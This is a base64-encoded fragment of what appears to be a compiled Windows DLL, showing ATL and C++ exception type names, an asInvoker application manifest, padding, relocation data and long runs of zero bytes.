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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQICAgICAgICAgICAgICAgIDAwMDAwMDAwAAAAAAAAAAI1VAAAAAAAACAAAAUOdAAAgAAAAk50AACQAAAPjmQAAKAAAAYOZAABAAAAA05kAAEQAAAATmQAASAAAA4OVAABMAAAC05UAAGAAAAHzlQAAZAAAAVOVAABoAAAAc5UAAGwAAAOTkQAAcAAAAvORAAB4AAACc5EAAHwAAADjkQAAgAAAAAORAACEAAAAI40AAIgAAAGjiQAB4AAAAWOJAAHkAAABI4kAAegAAADjiQAD8AAAANOJAAP8AAAAk4kAAAwAAAAcAAAB4AAAACgAAAP////+ACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//////////xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA